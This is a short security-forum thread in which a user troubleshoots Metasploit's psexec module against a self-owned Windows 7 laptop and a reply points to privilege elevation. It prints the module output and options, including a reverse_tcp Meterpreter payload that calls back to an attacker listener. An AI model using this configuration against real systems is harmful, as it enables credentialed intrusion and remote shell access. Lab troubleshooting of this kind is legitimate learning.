Results 1 to 2 of 2

Thread: Unable to fully execute "psexec" on Win7 target

  1. #1
    Just burned his ISO
    Join Date
    Jan 2011
    Plaisance, LA USA

    Default Unable to fully execute "psexec" on Win7 target

    I've been playing around with the "exploit/windows/smb/psexec" in metasploit with a reverse meterpreter as my payload. I've been able to sucessfully execute this "exploit" on VMware XP and Vista boxes with no problems; however, when I attempt this on two separate laptops (Attacker: BT4 R2 & Target: Win7 ), I am unable to get a session. UAC is disabled and my Win7 user is running as an administrator. I set up both computers myself side-by-side so I know the credentials are correct, but I receive the following output:

    msf exploit(psexec) > exploit
    [*] Started HTTPS reverse handler on
    [*] Connecting to the server...
    [*] Authenticating to|WORKGROUP as user 'TEST_USER'...
    [*] Uploading payload...
    [*] Created \xaFTFQQZ.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (LIxwwLpb - "MGUIXQycc")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Closing service handle...
    [*] Deleting \xaFTFQQZ.exe...
    [*] Exploit completed, but no session was created.
    Here are my options:
    msf exploit(psexec) > show options
    Module options (exploit/windows/smb/psexec):
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       RHOST      yes       The target address
       RPORT      445              yes       Set the SMB service port
       SMBPass    password         no        The password for the specified username
       SMBUser    TEST_USER        no        The username to authenticate as
    Payload options (windows/meterpreter/reverse_tcp):
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, none, process
       LHOST     yes       The listen address
       LPORT     4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       0   Automatic
    Any thoughts?

    *Edit: The output shows " HTTPS reverse handler" instead of reverse_tcp as in options because I tried switching payloads (to no avail). The result is the same.

  2. #2
    Senior Member voidnecron's Avatar
    Join Date
    May 2010

    Default Re: Unable to fully execute "psexec" on Win7 target

    Even with UAC disabled and the user being admin you still need to do 'Run as Administrator' to do certain things, ie: if you start a command prompt normally you wouldnt be able to run netsh, since this requieres higher privs.
    If you run the command prompt with "Run as Administrator" you would be able to do so.
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."

Similar Threads

  1. Solucion wifi con broadcom 4312 ("unable to get ip address")
    By yarol in forum Soporte en Wireless
    Replies: 0
    Last Post: 01-15-2011, 12:14 PM
  2. Replies: 0
    Last Post: 11-24-2010, 12:19 PM
  3. "No rule to make target "arghh help please :D
    By PwnStar in forum OLD Newbie Area
    Replies: 0
    Last Post: 01-29-2010, 08:39 PM
  4. Replies: 4
    Last Post: 01-30-2009, 08:52 PM
  5. Replies: 1
    Last Post: 08-02-2008, 10:06 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts